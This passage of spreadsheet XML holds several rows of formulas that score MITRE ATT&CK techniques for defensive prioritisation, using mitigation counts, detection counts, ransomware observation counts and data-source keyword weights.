        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.3968253968253971E-2</v>
      </c>
      <c r="AS403" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT403" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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04" spans="1:47" ht="32.1">
      <c r="A404" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9396190476190477E-2</v>
      </c>
      <c r="B404" s="25">
        <f>SUM(H404,M404,V404)*(1+SUM(AE404,AG404,AI404,AK404,AM404))</f>
        <v>0.19396190476190475</v>
      </c>
      <c r="C404" s="25" t="s">
        <v>1556</v>
      </c>
      <c r="D404" s="25" t="s">
        <v>690</v>
      </c>
      <c r="E404" s="25" t="s">
        <v>1557</v>
      </c>
      <c r="F404" s="51">
        <v>1</v>
      </c>
      <c r="G404" s="51">
        <v>1</v>
      </c>
      <c r="H404" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I404">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J404">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K404">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L404">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M404" s="25">
        <v>0</v>
      </c>
      <c r="N404" s="51">
        <v>0</v>
      </c>
      <c r="O404" s="51">
        <v>1</v>
      </c>
      <c r="P404" s="51">
        <v>0</v>
      </c>
      <c r="Q404" s="51">
        <v>0</v>
      </c>
      <c r="R404" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S404" s="51">
        <v>3</v>
      </c>
      <c r="T404" s="52" t="s">
        <v>247</v>
      </c>
      <c r="U404" s="51">
        <v>3</v>
      </c>
      <c r="V404" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.19047619047619E-2</v>
      </c>
      <c r="W404">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X404">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y404">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z404">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA404">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB404">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC404" s="29" t="s">
        <v>856</v>
      </c>
      <c r="AD404" s="25" t="str" cm="1">
        <f t="array" ref="AD404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC404)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE404" s="25">
        <f>IF(AD404="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF404" s="25" t="str" cm="1">
        <f t="array" ref="AF404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC404)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG404" s="25">
        <f>IF(AF404="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH404" s="25" t="str" cm="1">
        <f t="array" ref="AH404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC404)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI404" s="25">
        <f>IF(AH404="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ404" s="25" t="str" cm="1">
        <f t="array" ref="AJ404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC404)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK404" s="25">
        <f>IF(AJ404="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL404" s="25" t="str" cm="1">
        <f t="array" ref="AL404">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC404)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM404" s="25">
        <f>IF(AL404="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN404" s="52">
        <v>0</v>
      </c>
      <c r="AO404" s="51">
        <v>0</v>
      </c>
      <c r="AP404" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9396190476190477E-2</v>
      </c>
      <c r="AQ404" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.4653968253968255E-2</v>
      </c>
      <c r="AR404" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.4653968253968255E-2</v>
      </c>
      <c r="AS404" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT404" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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05" spans="1:47" ht="48">
      <c r="A405" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0899999999999998E-2</v>
      </c>
      <c r="B405" s="25">
        <f>SUM(H405,M405,V405)*(1+SUM(AE405,AG405,AI405,AK405,AM405))</f>
        <v>0.20900000000000002</v>
      </c>
      <c r="C405" s="25" t="s">
        <v>1558</v>
      </c>
      <c r="D405" s="25" t="s">
        <v>1559</v>
      </c>
      <c r="E405" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F405" s="51">
        <v>1</v>
      </c>
      <c r="G405" s="51">
        <v>1</v>
      </c>
      <c r="H405" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I405">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J405">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K405">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L405">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M405" s="25">
        <v>0</v>
      </c>
      <c r="N405" s="51">
        <v>0</v>
      </c>
      <c r="O405" s="51">
        <v>0</v>
      </c>
      <c r="P405" s="51">
        <v>0</v>
      </c>
      <c r="Q405" s="51">
        <v>4</v>
      </c>
      <c r="R405" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S405" s="51">
        <v>3</v>
      </c>
      <c r="T405" s="52" t="s">
        <v>1560</v>
      </c>
      <c r="U405" s="51">
        <v>1</v>
      </c>
      <c r="V405" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>5.7142857142857148E-2</v>
      </c>
      <c r="W405">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>4</v>
      </c>
      <c r="X405">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Y405">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Z405">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA405">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB405">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC405" s="29" t="s">
        <v>1369</v>
      </c>
      <c r="AD405" s="25" t="str" cm="1">
        <f t="array" ref="AD405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC405)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE405" s="25">
        <f>IF(AD405="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF405" s="25" t="str" cm="1">
        <f t="array" ref="AF405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC405)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG405" s="25">
        <f>IF(AF405="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH405" s="25" t="str" cm="1">
        <f t="array" ref="AH405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC405)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI405" s="25">
        <f>IF(AH405="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ405" s="25" t="str" cm="1">
        <f t="array" ref="AJ405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC405)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK405" s="25">
        <f>IF(AJ405="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL405" s="25" t="str" cm="1">
        <f t="array" ref="AL405">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC405)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM405" s="25">
        <f>IF(AL405="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN405" s="60">
        <v>0</v>
      </c>
      <c r="AO405" s="51">
        <v>0</v>
      </c>
      <c r="AP405" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0899999999999998E-2</v>
      </c>
      <c r="AQ405" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.9666666666666668E-2</v>
      </c>
      <c r="AR405" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.9666666666666668E-2</v>
      </c>
      <c r="AS405" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT405" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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06" spans="1:47" ht="32.1">
      <c r="A406" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4233333333333328E-2</v>
      </c>
      <c r="B406" s="25">
        <f>SUM(H406,M406,V406)*(1+SUM(AE406,AG406,AI406,AK406,AM406))</f>
        <v>0.20900000000000002</v>
      </c>
      <c r="C406" s="25" t="s">
        <v>1561</v>
      </c>
      <c r="D406" s="25" t="s">
        <v>863</v>
      </c>
      <c r="E406" s="25" t="s">
        <v>1562</v>
      </c>
      <c r="F406" s="51">
        <v>1</v>
      </c>
      <c r="G406" s="51">
        <v>1</v>
      </c>
      <c r="H406" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I406">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J406">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K406">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L406">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M406" s="25">
        <v>0</v>
      </c>
      <c r="N406" s="51">
        <v>0</v>
      </c>
      <c r="O406" s="51">
        <v>0</v>
      </c>
      <c r="P406" s="51">
        <v>0</v>
      </c>
      <c r="Q406" s="51">
        <v>0</v>
      </c>
      <c r="R406" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S406" s="51">
        <v>3</v>
      </c>
      <c r="T406" s="52" t="s">
        <v>1563</v>
      </c>
      <c r="U406" s="51">
        <v>3</v>
      </c>
      <c r="V406" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>5.7142857142857141E-2</v>
      </c>
      <c r="W406">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X406">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y406">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z406">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA406">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB406">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC406" s="29" t="s">
        <v>1564</v>
      </c>
      <c r="AD406" s="25" t="str" cm="1">
        <f t="array" ref="AD406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC406)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE406" s="25">
        <f>IF(AD406="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF406" s="25" t="str" cm="1">
        <f t="array" ref="AF406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC406)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG406" s="25">
        <f>IF(AF406="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH406" s="25" t="str" cm="1">
        <f t="array" ref="AH406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC406)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI406" s="25">
        <f>IF(AH406="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ406" s="25" t="str" cm="1">
        <f t="array" ref="AJ406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC406)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK406" s="25">
        <f>IF(AJ406="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL406" s="25" t="str" cm="1">
        <f t="array" ref="AL406">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC406)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM406" s="25">
        <f>IF(AL406="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN406" s="52">
        <v>1</v>
      </c>
      <c r="AO406" s="51">
        <v>1</v>
      </c>
      <c r="AP406" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4233333333333328E-2</v>
      </c>
      <c r="AQ406" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.9666666666666668E-2</v>
      </c>
      <c r="AR406" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.9666666666666668E-2</v>
      </c>
      <c r="AS406" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT406" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU40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07" spans="1:47" ht="32.1">
      <c r="A407" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0899999999999998E-2</v>
      </c>
      <c r="B407" s="25">
        <f>SUM(H407,M407,V407)*(1+SUM(AE407,AG407,AI407,AK407,AM407))</f>
        <v>0.20900000000000002</v>
      </c>
      <c r="C407" s="25" t="s">
        <v>1565</v>
      </c>
      <c r="D407" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E407" s="25" t="s">
        <v>1566</v>
      </c>
      <c r="F407" s="51">
        <v>1</v>
      </c>
      <c r="G407" s="51">
        <v>1</v>
      </c>
      <c r="H407" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I407">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J407">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K407">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L407">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M407" s="25">
        <v>0</v>
      </c>
      <c r="N407" s="51">
        <v>0</v>
      </c>
      <c r="O407" s="51">
        <v>0</v>
      </c>
      <c r="P407" s="51">
        <v>0</v>
      </c>
      <c r="Q407" s="51">
        <v>0</v>
      </c>
      <c r="R407" s="51"/>
      <c r="S407" s="51">
        <v>0</v>
      </c>
      <c r="T407" s="51" t="s">
        <v>1567</v>
      </c>
      <c r="U407" s="51">
        <v>6</v>
      </c>
      <c r="V407" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>5.7142857142857141E-2</v>
      </c>
      <c r="W407">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X407">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y407">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z407">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA407">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB407">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC407" s="29" t="s">
        <v>1568</v>
      </c>
      <c r="AD407" s="25" t="str" cm="1">
        <f t="array" ref="AD407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC407)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE407" s="25">
        <f>IF(AD407="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF407" s="25" t="str" cm="1">
        <f t="array" ref="AF407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC407)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG407" s="25">
        <f>IF(AF407="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH407" s="25" t="str" cm="1">
        <f t="array" ref="AH407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC407)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI407" s="25">
        <f>IF(AH407="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ407" s="25" t="str" cm="1">
        <f t="array" ref="AJ407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC407)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK407" s="25">
        <f>IF(AJ407="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL407" s="25" t="str" cm="1">
        <f t="array" ref="AL407">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC407)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM407" s="25">
        <f>IF(AL407="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN407" s="63"/>
      <c r="AO407" s="51"/>
      <c r="AP407" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0899999999999998E-2</v>
      </c>
      <c r="AQ407" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.9666666666666668E-2</v>
      </c>
      <c r="AR407" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.9666666666666668E-2</v>
      </c>
      <c r="AS407" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT407" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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08" spans="1:47" ht="96">
      <c r="A408" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.4249999999999997E-2</v>
      </c>
      <c r="B408" s="25">
        <f>SUM(H408,M408,V408)*(1+SUM(AE408,AG408,AI408,AK408,AM408))</f>
        <v>0.14249999999999999</v>
      </c>
      <c r="C408" s="25" t="s">
        <v>1569</v>
      </c>
      <c r="D408" s="25" t="s">
        <v>1570</v>
      </c>
      <c r="E408" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F408" s="51">
        <v>1</v>
      </c>
      <c r="G408" s="51">
        <v>0</v>
      </c>
      <c r="H408" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I408">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J408">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K408">
